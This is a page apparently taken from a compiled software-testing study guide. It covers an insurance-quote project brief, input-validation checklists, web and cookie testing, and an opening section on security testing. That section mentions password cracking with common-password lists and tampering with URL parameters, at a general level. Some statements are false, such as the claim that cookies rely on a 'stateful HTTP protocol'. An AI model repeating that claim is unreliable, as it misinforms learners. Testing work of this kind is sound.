You are on page 1of 111

Brief Information of customer business

The client is a leading Insurance service provider under Property and Casualty (P&C) Segment.
The client plans to increase the sale of Auto Insurance policy by directly selling to prospective
customer through Internet channel.

Brief information about customer requirement


Functionality
The ‘Auto Insurance quote’ application should be able to collect the information of the Internet
user, vehicle and drivers and provide online quote instantly. The information provided by the
user has to be saved locally so that the user can retrieve the information later. The actual policy
will be issued by a legacy application which will be integrated with this Quote application. The
integration with the legacy system and the issue of the legal Insurance policy is outside the scope
of this project.

Enterprise Resource Planning (ERP), is a computerized inventory control and production


planning system that was born from Material Requirements Planning (MRP) systems. ERP is
a system that organizes functions of an institution; supporting, for example, accounting,
finance, human resources and e-commerce applications through the creation of relational
databases and graphical user interfaces that unify the tasks of institutions like corporations,
government agencies, non-profit organizations, powerful institutions and industries and
businesses establishments.

CRM, or Customer Relationship Management, is an information system that integrates


planning, scheduling and the control of pre-sale and post-sale activities within businesses.
CRM is a series of technologies and business strategies used to create formidable
customer/client relationships. CRM Analysts study stored information related to customer’s
habits and behaviors to create methods that increase productivity, profit and popularity.
Marketing Strategies are created out of analyzed data from automated CRM.

Supply chain management was a term invented by Keith Oliver, a consultant belonging to
the firm Booz Allen Hamilton, in the year 1982, to describe the overall process of planning,
implementing, and controlling what goes on at the supply chain in order to satisfy
customers’ needs in a quick, efficient manner. As carried out in practice, supply chain
management can involve everything from overlooking the exchange and storage of raw
materials, taking inventory of all work that is in process, as well as the movement of goods
from their point of origin to the point where they will be consumed.

Guidelines while developing software Product


Strings
• empty string
• String consisting solely of white space
• String with leading or trailing white space
• syntactically legal: short and long values
• syntactically legal: semantically legal and illegal values
• syntactically illegal value: illegal characters or combinations
• Make sure to test special characters such as #, ", ', &, and <
• Make sure to test "Foreign" characters typed on international keyboards
Numbers
• empty string, if possible
• 0
• in range positive, small and large
• in range negative, small and large
• out of range positive
• out of range negative
• with leading zeros
• syntactically invalid (e.g., includes letters)
• Floating values
Identifiers
• empty string
• syntactically legal value
• syntactically legal: reference to existing ID, invalid reference
• syntactically illegal value
Radio buttons
• one item checked
• nothing checked, if possible
Check boxes
• checked
• unchecked
Drop down menus
• select each item in turn
Scrolling Lists
• select no item, if possible
• select each item in turn
• select combinations of items, if possible
• select all items, if possible
File upload
• blank
• 0 byte file
• long file
• short file name
• long file name
• syntactically illegal file name, if possible (e.g., "File With Spaces.tar.gz")
Data type
• Name(First name,Last name) should be in alphabets
• Address in alphanumeric
• Telephone no,mobile should be according to client’s
requirement(Numeric/Alphanumeric)
• Check that phone no should contain special characters or not
• Password should be in encrypted format
• Check that Email should contain the format
Browser Compactibility
• Check that application runs on different browser like Internet
Explorer,Netscape,Mozilla,Firefox,Opera

Images
• Check the type of image(jpg,jpeg,bmp.gif)
• Maximum size
• Compactibility with other browser
• Resolution
• Clarity of the image

Web site testing


• Consideration should be given to the interactions between html pages, TCP/IP
communications,
• Internet connections, firewalls, applications that run in web pages (such as applets,
javascript, plug-in applications), and applications that run on the server side (such as cgi
scripts, database interfaces, logging applications, dynamic page generators, asp, etc.).
• There are a wide variety of servers and browsers, various versions of each, small but
sometimes significant differences between them, variations in connection speeds, rapidly
changing technologies, and multiple standards and protocols.
• What are the expected loads on the server (e.g., number of hits per unit time?), and what
kind of performance is required under such loads (such as web server response time,
database query response times).
• Who is the target audience? What kind of browsers will they be using? What kind of
connection speeds will they by using? Are they intra- organization (thus with likely high
connection speeds and similar browsers) or Internet-wide (thus with a wide variety of
connection speeds and browser types)?
• What kind of performance is expected on the client side (e.g., how fast should pages
appear, how fast should animations, applets, etc. load and run)?
• Will down time for server and content maintenance/upgrades be allowed? how much?
• What processes will be required to manage updates to the web site's content, and what
are the requirements for maintaining, tracking, and controlling page content, graphics,
links, etc.?
• Which HTML specification will be adhered to? How strictly? What variations will be
allowed for targeted browsers?
• Can testing be done on the production system, or will a separate test system be required?
How are browser caching, variations in browser option settings, dial-up connection
variabilities, and real-world internet 'traffic congestion' problems to be accounted for in
testing?
What is a good Code
• Minimize or eliminate use of global variables.
• use descriptive function and method names - use both upper and lower case, avoid
abbreviations, use as many characters as necessary to be adequately descriptive (use of
more than 20 characters is not out of line); be consistent in naming conventions.
• use descriptive variable names - use both upper and lower case, avoid abbreviations, use
as many characters as necessary to be adequately descriptive (use of more than 20
characters is not out of line); be consistent in naming conventions.
• function and method sizes should be minimized; less than 100 lines of code is good, less
than 50 lines is preferable.
• function descriptions should be clearly spelled out in comments preceding a function's
code.
• organize code for readability.
• use whitespace generously - vertically and horizontally
• each line of code should contain 70 characters max.
• one code statement per line.
• coding style should be consistent throught a program (eg, use of brackets, indentations,
naming conventions, etc.)
• in adding comments, err on the side of too many rather than too few comments; a
common rule of thumb is that there should be at least as many lines of comments
(including header blocks) as lines of code.
• no matter how small, an application should include documentaion of the overall
program function and flow (even a few paragraphs is better than nothing); or if possible a
separate flow chart and detailed program documentation.
• make extensive use of error handling procedures and status and error logging.
• for C++, to minimize complexity and increase maintainability, avoid too many levels of
inheritance in class heirarchies (relative to the size and complexity of the application).
Minimize use of multiple inheritance, and minimize use of operator overloading (note that
the Java programming language eliminates multiple inheritance and operator
overloading.)
• for C++, keep class methods small, less than 50 lines of code per method is preferable.
• for C++, make liberal use of exception handlers

Web Design Mistakes


• Poor load time
• Poor overall appearance
• Spelling/Grammar mistakes
• No contact information
• Poor content
• Poor navigation
• Broken links and graphics
• Poor browser compatibility
• Large slow loading graphics
• Too many graphics
• Pages scrolling to oblivion
• Multiple use of animated graphics
• Animated bullets
• Too many graphic and/or line dividers
• Busy, distracting backgrounds
• Multiple banners and buttons
• Poor use of frames
• Large fonts
• Pop up messages
• Over use of Java
• Poor use of tables
• Poor organization
• Different backgrounds on each page
• Over powering music set to AutoPlay
• Confusing
• Too much advertising
• Large Welcome banners
• Multiple colored text
• Text difficult to read
• No Meta tags
• Multiple use of different fonts
• Under construction signs
• Scrolling text in the status bar
• Large scrolling text across the page
• Poor use of mouse over effects
• Take your time and design your site very carefully. It may take you a little longer, but it
will be well worth the extra time in the long run.

What is Good Design


• 'Design' could refer to many things, but often refers to 'functional design' or 'internal
design'. Good internal design is indicated by software code whose overall structure is clear,
understandable, easily modifiable, and maintainable; is robust with sufficient error-
handling and status logging capability; and works correctly when implemented.
• Good functional design is indicated by an application whose functionality can be traced
back to customer and end-user requirements. the program should act in a way that least
surprises the user
What can be done if requirements are changing continuously?
This is a common problem for organizations where there are expectations that
requirements can be pre-determined and remain stable. If these expectations are
reasonable, here are some approaches:
• Work with the project's stakeholders early on to understand how requirements might
change so that alternate test plans and strategies can be worked out in advance, if possible.
• It's helpful if the application's initial design allows for some adaptability so that later
changes do not require redoing the application from scratch.
• If the code is well-commented and well-documented this makes changes easier for the
developers.
• Use some type of rapid prototyping whenever possible to help customers feel sure of
their requirements and minimize changes.
• The project's initial schedule should allow for some extra time commensurate with the
possibility of changes.
• Try to move new requirements to a 'Phase 2' version of an application, while using the
original requirements for the 'Phase 1' version.
• Negotiate to allow only easily-implemented new requirements into the project, while
moving more difficult new requirements into future versions of the application.
• Be sure that customers and management understand the scheduling impacts, inherent
risks, and costs of significant requirements changes. Then let management or the customers
(not the developers or testers) decide if the changes are warranted - after all, that's their
job.
• Balance the effort put into setting up automated testing with the expected effort required
to refactor them to deal with changes.
• Try to design some flexibility into automated test scripts.
• Focus initial automated testing on application aspects that are most likely to remain
unchanged.
• Devote appropriate effort to risk analysis of changes to minimize regression testing
needs.
• Design some flexibility into test cases (this is not easily done; the best bet might be to
minimize the detail in the test cases, or set up only higher-level generic-type test plans)
• Focus less on detailed test plans and test cases and more on ad hoc testing (with an
understanding of the added risk that this entails).

Common problems in software development


• poor requirements - if requirements are unclear, incomplete, too general, and not
testable, there will be problems.
• unrealistic schedule - if too much work is crammed in too little time, problems are
inevitable.
• inadequate testing - no one will know whether or not the program is any good until the
customer complains or systems crash.
• featuritis - requests to pile on new features after development is underway; extremely
common.
• miscommunication - if developers don't know what's needed or customer's have
erroneous expectations, problems are guaranteed.
How to overcome to software development problems?
• solid requirements - clear, complete, detailed, cohesive, attainable, testable requirements
that are agreed to by all players. Use prototypes to help nail down requirements. In 'agile'-
type environments, continuous close coordination with customers/end-users is necessary.
• realistic schedules - allow adequate time for planning, design, testing, bug fixing, re-
testing, changes, and documentation; personnel should be able to complete the project
without burning out.
• adequate testing - start testing early on, re-test after fixes or changes, plan for adequate
time for testing and bug-fixing. 'Early' testing ideally includes unit testing by developers
and built-in testing and diagnostic capabilities.
• stick to initial requirements as much as possible - be prepared to defend against
excessive changes and additions once development has begun, and be prepared to explain
consequences. If changes are necessary, they should be adequately reflected in related
schedule changes. If possible, work closely with customers/end-users to manage
expectations. This will provide them a higher comfort level with their requirements
decisions and minimize excessive changes later on.
• communication - require walkthroughs and inspections when appropriate; make
extensive use of group communication tools - groupware, wiki's bug-tracking tools and
change management tools, intranet capabilities, etc.; insure that
information/documentation is available and up-to-date - preferably electronic, not paper;
promote teamwork and cooperation; use protoypes and/or continuous communication with
end-users if possible to clarify expectations.

Why does software have bugs?


• miscommunication or no communication - as to specifics of what an application should
or shouldn't do (the application's requirements).
• software complexity - the complexity of current software applications can be difficult to
comprehend for anyone without experience in modern-day software development. Multi-
tiered applications, client-server and distributed applications, data communications,
enormous relational databases, and sheer size of applications have all contributed to the
exponential growth in software/system complexity.
• programming errors - programmers, like anyone else, can make mistakes.
• changing requirements (whether documented or undocumented) - the end-user may not
understand the effects of changes, or may understand and request them anyway - redesign,
rescheduling of engineers, effects on other projects, work already completed that may have
to be redone or thrown out, hardware requirements that may be affected, etc.
• If there are many minor changes or any major changes, known and unknown
dependencies among parts of the project are likely to interact and cause problems, and the
complexity of coordinating changes may result in errors. Enthusiasm of engineering staff
may be affected. time pressures - scheduling of software projects is difficult at best, often
requiring a lot of guesswork. When deadlines loom and the crunch comes, mistakes will be
made.
• egos - people prefer to say things like:
• 'no problem'
• 'piece of cake'
• 'I can whip that out in a few hours'
• 'it should be easy to update that old code'
• poorly documented code - it's tough to maintain and modify code that is badly written or
poorly documented; the result is bugs. In many organizations management provides no
incentive for programmers to document their code or write clear, understandable,
maintainable code. In fact, it's usually the opposite: they get points mostly for quickly
turning out code, and there's job security if nobody else can understand it ('if it was hard
to write, it should be hard to read').
• software development tools - visual tools, class libraries, compilers, scripting tools, etc.
often introduce their own bugs or are poorly documented, resulting in added bugs.

What is client-server and web based testing and


how to test these applications
Projects are broadly divided into two types of:

• 2 tier applications
• 3 tier applications
CLIENT / SERVER TESTING
This type of testing usually done for 2 tier applications (usually developed for LAN)
Here we will be having front-end and backend.
The application launched on front-end will be having forms and reports which will be
monitoring and manipulating data

E.g: applications developed in VB, VC++, Core Java, C, C++, D2K, PowerBuilder etc.,
The backend for these applications would be MS Access, SQL Server, Oracle, Sybase, Mysql,
Quadbase
The tests performed on these types of applications would be
- User interface testing
- Manual support testing
- Functionality testing
- Compatibility testing & configuration testing
- Intersystem testing
WEB TESTING
This is done for 3 tier applications (developed for Internet / intranet / xtranet)
Here we will be having Browser, web server and DB server.
The applications accessible in browser would be developed in HTML, DHTML, XML,
JavaScript etc. (We can monitor through these applications)

Applications for the web server would be developed in Java, ASP, JSP, VBScript, JavaScript,
Perl, Cold Fusion, PHP etc. (All the manipulations are done on the web server with the help
of these programs developed)

The DBserver would be having oracle, sql server, sybase, mysql etc. (All data is stored in
the database available on the DB server)

The tests performed on these types of applications would be


- User interface testing
- Functionality testing
- Security testing
- Browser compatibility testing
- Load / stress testing
- Interoperability testing/intersystem testing
- Storage and data volume testing
A web-application is a three-tier application.
This has a browser (monitors data) [monitoring is done using html, dhtml, xml, javascript]-
> webserver (manipulates data) [manipulations are done using programming languages or
scripts like adv java, asp, jsp, vbscript, javascript, perl, coldfusion, php] -> database server
(stores data) [data storage and retrieval is done using databases like oracle, sql server,
sybase, mysql].
The types of tests, which can be applied on this type of applications, are:
1. User interface testing for validation & user friendliness
2. Functionality testing to validate behaviors, i/p, error handling, o/p, manipulations,
services levels, order of functionality, links, content of web page & backend coverage’s
3. Security testing
4. Browser compatibility
5. Load / stress testing
6. Interoperability testing
7. Storage & data volume testing
A client-server application is a two tier application.
This has forms & reporting at front-end (monitoring & manipulations are done) [using vb,
vc++, core java, c, c++, d2k, power builder etc.,] -> database server at the backend [data
storage & retrieval) [using ms access, sql server, oracle, sybase, mysql, quadbase etc.,]
The tests performed on these applications would be
1. User interface testing
2. Manual support testing
3. Functionality testing
4. Compatibility testing
5. Intersystem testing
Some more points to clear the difference between client server, web and desktop
applications:
Desktop application:
1. Application runs in single memory (Front end and Back end in one place)
2. Single user only
Client/Server application:
1. Application runs in two or more machines
2. Application is a menu-driven
3. Connected mode (connection exists always until logout)
4. Limited number of users
5. Less number of network issues when compared to web app.
Web application:
1. Application runs in two or more machines
2. URL-driven
3. Disconnected mode (state less)
4. Unlimited number of users
5. Many issues like hardware compatibility, browser compatibility, version compatibility,
security issues, performance issues etc.
As per difference in both the applications come where, how to access the resources. In
client server once connection is made it will be in state on connected, whereas in case of
web testing http protocol is stateless, then there comes logic of cookies, which is not in
client server.

For client server application users are well known, whereas for web application any user can
login and access the content, he/she will use it as per his intentions.

So, there are always issues of security and compatibility for web application.

Web Testing: Complete guide on testing web


applications
In my previous post I have outlined points to be considered while testing web applications.
Here we will see some more details on web application testing with web testing test
cases. Let me tell you one thing that I always like to share practical knowledge, which can
be useful to users in their career life. This is a quite long article so sit back and get relaxed
to get most out of it.
Let’s have first web testing checklist.
1) Functionality Testing
2) Usability testing
3) Interface testing
4) Compatibility testing
5) Performance testing
6) Security testing
1) Functionality Testing:
Test for – all the links in web pages, database connection, forms used in the web pages for
submitting or getting information from user, Cookie testing.

Check all the links:


• Test the outgoing links from all the pages from specific domain under test.
• Test all internal links.
• Test links jumping on the same pages.
• Test links used to send the email to admin or other users from web pages.
• Test to check if there are any orphan pages.
• Lastly in link checking, check for broken links in all above-mentioned links.
Test forms in all pages:
Forms are the integral part of any web site. Forms are used to get information from users
and to keep interaction with them. So what should be checked on these forms?
• First check all the validations on each field.
• Check for the default values of fields.
• Wrong inputs to the fields in the forms.
• Options to create forms if any, form delete, view or modify the forms.
Let’s take example of the search engine project currently I am working on, In this project
we have advertiser and affiliate signup steps. Each sign up step is different but dependent
on other steps. So sign up flow should get executed correctly. There are different field
validations like email Ids, User financial info validations. All these validations should get
checked in manual or automated web testing.

Cookies testing:
Cookies are small files stored on user machine. These are basically used to maintain the
session mainly login sessions. Test the application by enabling or disabling the cookies in
your browser options. Test if the cookies are encrypted before writing to user machine. If
you are testing the session cookies (i.e. cookies expire after the sessions ends) check for
login sessions and user stats after session end. Check effect on application security by
deleting the cookies. (I will soon write separate article on cookie testing)
Validate your HTML/CSS:
If you are optimizing your site for Search engines then HTML/CSS validation is very
important. Mainly validate the site for HTML syntax errors. Check if site is crawlable to
different search engines.
Database testing:
Data consistency is very important in web application. Check for data integrity and errors
while you edit, delete, modify the forms or do any DB related functionality.
Check if all the database queries are executing correctly, data is retrieved correctly and also
updated correctly. More on database testing could be load on DB, we will address this in
web load or performance testing below.
2) Usability Testing:
Test for navigation:
Navigation means how the user surfs the web pages, different controls like buttons, boxes
or how user using the links on the pages to surf different pages.
Usability testing includes:
Web site should be easy to use. Instructions should be provided clearly. Check if the
provided instructions are correct means whether they satisfy purpose.
Main menu should be provided on each page. It should be consistent.
Content checking:
Content should be logical and easy to understand. Check for spelling errors. Use of dark
colors annoys users and should not be used in site theme. You can follow some standards
that are used for web page and content building. These are common accepted standards
like as I mentioned above about annoying colors, fonts, frames etc.
Content should be meaningful. All the anchor text links should be working properly. Images
should be placed properly with proper sizes.
These are some basic standards that should be followed in web development. Your task is to
validate all for UI testing
Other user information for user help:
Like search option, sitemap, help files etc. Sitemap should be present with all the links in
web sites with proper tree view of navigation. Check for all links on the sitemap.
“Search in the site” option will help users to find content pages they are looking for easily
and quickly. These are all optional items and if present should be validated.
3) Interface Testing:
The main interfaces are:
Web server and application server interface
Application server and Database server interface.
Check if all the interactions between these servers are executed properly. Errors are
handled properly. If database or web server returns any error message for any query by
application server then application server should catch and display these error messages
appropriately to users. Check what happens if user interrupts any transaction in-between?
Check what happens if connection to web server is reset in between?
4) Compatibility Testing:
Compatibility of your web site is very important testing aspect. See which compatibility test
to be executed:
• Browser compatibility
• Operating system compatibility
• Mobile browsing
• Printing options
Browser compatibility:
In my web-testing career I have experienced this as most influencing part on web site
testing.
Some applications are very dependent on browsers. Different browsers have different
configurations and settings that your web page should be compatible with. Your web site
coding should be cross browser platform compatible. If you are using java scripts or AJAX
calls for UI functionality, performing security checks or validations then give more stress on
browser compatibility testing of your web application.
Test web application on different browsers like Internet explorer, Firefox, Netscape
navigator, AOL, Safari, Opera browsers with different versions.
OS compatibility:
Some functionality in your web application is may not be compatible with all operating
systems. All new technologies used in web development like graphics designs, interface calls
like different API’s may not be available in all Operating Systems.
Test your web application on different operating systems like Windows, Unix, MAC, Linux,
Solaris with different OS flavors.
Mobile browsing:
This is new technology age. So in future Mobile browsing will rock. Test your web pages on
mobile browsers. Compatibility issues may be there on mobile.
Printing options:
If you are giving page-printing options then make sure fonts, page alignment, page graphics
getting printed properly. Pages should be fit to paper size or as per the size mentioned in
printing option.
5) Performance testing:
Web application should sustain to heavy load. Web performance testing should include:
Web Load Testing
Web Stress Testing
Test application performance on different internet connection speed.
In web load testing test if many users are accessing or requesting the same page. Can
system sustain in peak load times? Site should handle many simultaneous user requests,
large input data from users, Simultaneous connection to DB, heavy load on specific pages
etc.
Stress testing: Generally stress means stretching the system beyond its specification
limits. Web stress testing is performed to break the site by giving stress and checked how
system reacts to stress and how system recovers from crashes.
Stress is generally given on input fields, login and sign up areas.
In web performance testing web site functionality on different operating systems, different
hardware platforms is checked for software, hardware memory leakage errors,

6) Security Testing:
Following are some test cases for web security testing:

• Test by pasting internal url directly into browser address bar without login. Internal
pages should not open.
• If you are logged in using username and password and browsing internal pages then
try changing url options directly. I.e. If you are checking some publisher site
statistics with publisher site ID= 123. Try directly changing the url site ID parameter
to different site ID which is not related to logged in user. Access should denied for
this user to view others stats.
• Try some invalid inputs in input fields like login username, password, input text
boxes. Check the system reaction on all invalid inputs.
• Web directories or files should not be accessible directly unless given download
option.
• Test the CAPTCHA for automates scripts logins.
• Test if SSL is used for security measures. If used proper message should get
displayed when user switch from non-secure http:// pages to secure https:// pages
and vice versa.
• All transactions, error messages, security breach attempts should get logged in log
files somewhere on web server.
I think I have addressed all major web testing methods. I have worked for around 2
years out of my testing career on web testing. There are some experts who have spent their
whole career life on web testing. If I missed out addressing some important web testing
aspect then let me know in comments below. I will keep on updating the article for latest
testing information.

How can a Web site be tested?


Points to be considered while testing a Web site:
Web sites are essentiallyclient/server applications -
with web servers and ‘browser’ clients.
Consideration should be given to the interactions betweenhtml pages, TCP/IP
communications, Internet connections, firewalls, applications that run in web
pages (such as applets, javascript, plug-in applications), and applications that run on the
server side (such as cgi scripts, database interfaces, logging applications, dynamic page
generators, asp, etc.).
Additionally, there are a wide variety of servers and browsers, various versions of each,
small but sometimes significant differences between them, variations in connection speeds,
rapidly changing technologies, and multiple standards and protocols. The end result is that
testing for web sites can become a major ongoing effort.
Other considerations might include:
What are the expected loads on the server (e.g., number of hits per unit time?), and what
kind of performance is required under such loads (such as web server response time,
database query response times). What kinds of tools will be needed for performance testing
(such as web load testing tools, other tools already in house that can be adapted, web robot
downloading tools, etc.)?

Who is the target audience? What kind of browsers will they be using? What kind of
connection speeds will they by using? Are they intra- organization (thus with likely high
connection speeds and similar browsers) or Internet-wide (thus with a wide variety of
connection speeds and browser types)?

What kind of performance is expected on the client side (e.g., how fast should pages
appear, how fast should animations, applets, etc. load and run)?

Will down time for server and content maintenance/upgrades be allowed? how much?

What kinds of security (firewalls, encryptions, passwords, etc.) will be required and what is
it expected to do? How can it be tested?

How reliable are the site’s Internet connections required to be? And how does that affect
backup system or redundant connection requirements and testing?

What processes will be required to manage updates to the web site’s content, and

what are the requirements for maintaining, tracking, and controlling page content, graphics,
links, etc.?

Which HTML specification will be adhered to? How strictly? What variations will be allowed
for targeted browsers?

Will there be any standards or requirements for page appearance and/or graphics
throughout a site or parts of a site??

How will internal and external links be validated and updated? how often?
Can testing be done on the production system, or will a separate test system be required?
How are browser caching, variations in browser option settings, dial-up connection
variabilities, and real-world internet ‘traffic congestion’ problems to be accounted for in
testing?
How extensive or customized are the server logging and reporting requirements; are they
considered an integral part of the system and do they require testing?

How are cgi programs, applets, javascripts, ActiveX components, etc. to be maintained,
tracked, controlled, and tested?
Pages should be 3-5 screens max unless content is tightly focused on a single topic. If
larger, provide internal links within the page.
The page layouts and design elements should be consistent throughout a site, so that it’s
clear to the user that they’re still within a site.

Pages should be as browser-independent as possible, or pages should be provided or


generated based on the browser-type.

All pages should have links external to the page; there should be no dead-end pages.
The page owner, revision date, and a link to a contact person or organization should be
included on each page.

Website Cookie Testing, Test cases for testing


web application cookies?
We will first focus on what exactly cookies are and how they work. It would be easy for you
to understand the test cases for testing cookies when you have clear understanding of how
cookies work? How cookies stored on hard drive? And how can we edit cookie settings?

What is Cookie?
Cookie is small information stored in text file on user’s hard drive by web server. This
information is later used by web browser to retrieve information from that machine.
Generally cookie contains personalized user data or information that is used to communicate
between different web pages.
Why Cookies are used?
Cookies are nothing but the user’s identity and used to track where the user navigated
throughout the web site pages. The communication between web browser and web server is
stateless.
For example if you are accessing domain http://www.example.com/1.html then web
browser will simply query to example.com web server for the page 1.html. Next time if you
type page as http://www.example.com/2.html then new request is send to example.com
web server for sending 2.html page and web server don’t know anything about to whom the
previous page 1.html served.
What if you want the previous history of this user communication with the web server? You
need to maintain the user state and interaction between web browser and web server
somewhere. This is where cookie comes into picture. Cookies serve the purpose of
maintaining the user interactions with web server.

How cookies work?


The HTTP protocol used to exchange information files on the web is used to maintain the
cookies. There are two types of HTTP protocol. Stateless HTTP and Stateful HTTP protocol.
Stateless HTTP protocol does not keep any record of previously accessed web page history.
While Stateful HTTP protocol do keep some history of previous web browser and web server
interactions and this protocol is used by cookies to maintain the user interactions.
Whenever user visits the site or page that is using cookie, small code inside that HTML page
(Generally a call to some language script to write the cookie like cookies in JAVAScript, PHP,
Perl) writes a text file on users machine called cookie.
Here is one example of the code that is used to write cookie and can be placed inside any
HTML page:
Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME;

When user visits the same page or domain later time this cookie is read from disk and used
to identify the second visit of the same user on that domain. Expiration time is set while
writing the cookie. This time is decided by the application that is going to use the cookie.

Generally two types of cookies are written on user machine.

1) Session cookies: This cookie is active till the browser that invoked the cookie is open.
When we close the browser this session cookie gets deleted. Some time session of say 20
minutes can be set to expire the cookie.
2) Persistent cookies: The cookies that are written permanently on user machine and
lasts for months or years.
Where cookies are stored?
When any web page application writes cookie it get saved in a text file on user hard disk
drive. The path where the cookies get stored depends on the browser. Different browsers
store cookie in different paths. E.g. Internet explorer store cookies on
path “C:\Documents and Settings\Default User\Cookies”
Here the “Default User” can be replaced by the current user you logged in as. Like
“Administrator”, or user name like “Vijay” etc.
The cookie path can be easily found by navigating through the browser options. In Mozilla
Firefox browser you can even see the cookies in browser options itself. Open the Mozila
browser, click on Tools->Options->Privacy and then “Show cookies” button.
How cookies are stored?
Lets take example of cookie written by rediff.com on Mozilla Firefox browser:
On Mozilla Firefox browser when you open the page rediff.com or login to your rediffmail
account, a cookie will get written on your Hard disk. To view this cookie simply click on
“Show cookies” button mentioned on above path. Click on Rediff.com site under this cookie
list. You can see different cookies written by rediff domain with different names.
Site: Rediff.com Cookie name: RMID
Name: RMID (Name of the cookie)
Content: 1d11c8ec44bf49e0… (Encrypted content)
Domain: .rediff.com
Path: / (Any path after the domain name)
Send For: Any type of connection
Expires: Thursday, December 31, 2020 11:59:59 PM
Applications where cookies can be used:
1) To implement shopping cart:
Cookies are used for maintaining online ordering system. Cookies remember what user
wants to buy. What if user adds some products in their shopping cart and if due to some
reason user don’t want to buy those products this time and closes the browser window?
When next time same user visits the purchase page he can see all the products he added in
shopping cart in his last visit.
2) Personalized sites:
When user visits certain pages they are asked which pages they don’t want to visit or
display. User options are get stored in cookie and till the user is online, those pages are not
shown to him.
3) User tracking:
To track number of unique visitors online at particular time.
4) Marketing:
Some companies use cookies to display advertisements on user machines. Cookies control
these advertisements. When and which advertisement should be shown? What is the
interest of the user? Which keywords he searches on the site? All these things can be
maintained using cookies.
5) User sessions:
Cookies can track user sessions to particular domain using user ID and password.
Drawbacks of cookies:
1) Even writing Cookie is a great way to maintain user interaction, if user has set browser
options to warn before writing any cookie or disabled the cookies completely then site
containing cookie will be completely disabled and can not perform any operation resulting in
loss of site traffic.
2) Too many Cookies:
If you are writing too many cookies on every page navigation and if user has turned on
option to warn before writing cookie, this could turn away user from your site.
3) Security issues:
Some times users personal information is stored in cookies and if someone hack the cookie
then hacker can get access to your personal information. Even corrupted cookies can be
read by different domains and lead to security issues.
4) Sensitive information:
Some sites may write and store your sensitive information in cookies, which should not be
allowed due to privacy concerns.
This should be enough to know what cookies are. If you want more cookie info see Cookie
Central page.
Some Major Test cases for web application cookie testing:
The first obvious test case is to test if your application is writing cookies properly on disk.
You can use the Cookie Tester applicationalso if you don’t have any web application to test
but you want to understand the cookie concept for testing.
Test cases:
1) As a Cookie privacy policy make sure from your design documents that no personal or
sensitive data is stored in the cookie.
2) If you have no option than saving sensitive data in cookie make sure data stored in
cookie is stored in encrypted format.
3) Make sure that there is no overuse of cookies on your site under test. Overuse of
cookies will annoy users if browser is prompting for cookies more often and this could result
in loss of site traffic and eventually loss of business.
4) Disable the cookies from your browser settings: If you are using cookies on your site,
your sites major functionality will not work by disabling the cookies. Then try to access the
web site under test. Navigate through the site. See if appropriate messages are displayed to
user like “For smooth functioning of this site make sure that cookies are enabled on your
browser”. There should not be any page crash due to disabling the cookies. (Please make
sure that you close all browsers, delete all previously written cookies before performing this
test)
5) Accepts/Reject some cookies: The best way to check web site functionality is, not to
accept all cookies. If you are writing 10 cookies in your web application then randomly
accept some cookies say accept 5 and reject 5 cookies. For executing this test case you can
set browser options to prompt whenever cookie is being written to disk. On this prompt
window you can either accept or reject cookie. Try to access major functionality of web site.
See if pages are getting crashed or data is getting corrupted.
6) Delete cookie: Allow site to write the cookies and then close all browsers and manually
delete all cookies for web site under test. Access the web pages and check the behavior of
the pages.
7) Corrupt the cookies: Corrupting cookie is easy. You know where cookies are stored.
Manually edit the cookie in notepad and change the parameters to some vague values. Like
alter the cookie content, Name of the cookie or expiry date of the cookie and see the site
functionality. In some cases corrupted cookies allow to read the data inside it for any other
domain. This should not happen in case of your web site cookies. Note that the cookies
written by one domain say rediff.com can’t be accessed by other domain say yahoo.com
unless and until the cookies are corrupted and someone trying to hack the cookie data.
8 ) Checking the deletion of cookies from your web application page: Some times
cookie written by domain say rediff.com may be deleted by same domain but by different
page under that domain. This is the general case if you are testing some ‘action tracking’
web portal. Action tracking or purchase tracking pixel is placed on the action web page and
when any action or purchase occurs by user the cookie written on disk get deleted to avoid
multiple action logging from same cookie. Check if reaching to your action or purchase page
deletes the cookie properly and no more invalid actions or purchase get logged from same
user.
9) Cookie Testing on Multiple browsers: This is the important case to check if your web
application page is writing the cookies properly on different browsers as intended and site
works properly using these cookies. You can test your web application on Major used
browsers like Internet explorer (Various versions), Mozilla Firefox, Netscape, Opera etc.
10) If your web application is using cookies to maintain the logging state of any
user then log in to your web application using some username and password. In many
cases you can see the logged in user ID parameter directly in browser address bar. Change
this parameter to different value say if previous user ID is 100 then make it 101 and press
enter. The proper access message should be displayed to user and user should not be able
to see other users account.
These are some Major test cases to be considered while testing website cookies.
You can write multiple test cases from these test cases by performing various
combinations. If you have some different application scenario, you can mention
your test cases in comments belo

An approach for Security Testing of Web


Applications
Introduction
As more and more vital data is stored in web applications and the number of transactions on
the web increases, proper security testing of web applications is becoming very important.
Security testing is the process that determines that confidential data stays
confidential (i.e. it is not exposed to individuals/ entities for which it is not meant) and
users can perform only those tasks that they are authorized to perform (e.g. a user should
not be able to deny the functionality of the web site to other users, a user should not be
able to change the functionality of the web application in an unintended way etc.).
Some key terms used in security testing
Before we go further, it will be useful to be aware of a few terms that are frequently used in
web application security testing:

What is “Vulnerability”?
This is a weakness in the web application. The cause of such a “weakness” can be bugs in
the application, an injection (SQL/ script code) or the presence of viruses.

What is “URL manipulation”?


Some web applications communicate additional information between the client (browser)
and the server in the URL. Changing some information in the URL may sometimes lead to
unintended behavior by the server.
What is “SQL injection”?
This is the process of inserting SQL statements through the web application user interface
into some query that is then executed by the server.
What is “XSS (Cross Site Scripting)”?
When a user inserts HTML/ client-side script in the user interface of a web application and
this insertion is visible to other users, it is called XSS.
What is “Spoofing”?
The creation of hoax look-alike websites or emails is called spoofing.
Security testing approach:
In order to perform a useful security test of a web application, the security tester should
have good knowledge of the HTTP protocol. It is important to have an understanding of how
the client (browser) and the server communicate using HTTP. Additionally, the tester should
at least know the basics of SQL injection and XSS. Hopefully, the number of security defects
present in the web application will not be high. However, being able to accurately describe
the security defects with all the required details to all concerned will definitely help.

1. Password cracking:
The security testing on a web application can be kicked off by “password cracking”. In order
to log in to the private areas of the application, one can either guess a username/ password
or use some password cracker tool for the same. Lists of common usernames and
passwords are available along with open source password crackers. If the web application
does not enforce a complex password (e.g. with alphabets, number and special characters,
with at least a required number of characters), it may not take very long to crack the
username and password.

If username or password is stored in cookies without encrypting, attacker can use different
methods to steal the cookies and then information stored in the cookies like username and
password.

For more details see article on “Website cookie testing”.


2. URL manipulation through HTTP GET methods:
The tester should check if the application passes important information in the querystring.
This happens when the application uses the HTTP GET method to pass information between
the client and the server. The information is passed in parameters in the querystring. The
tester can modify a parameter value in the querystring to check if the server accepts it.

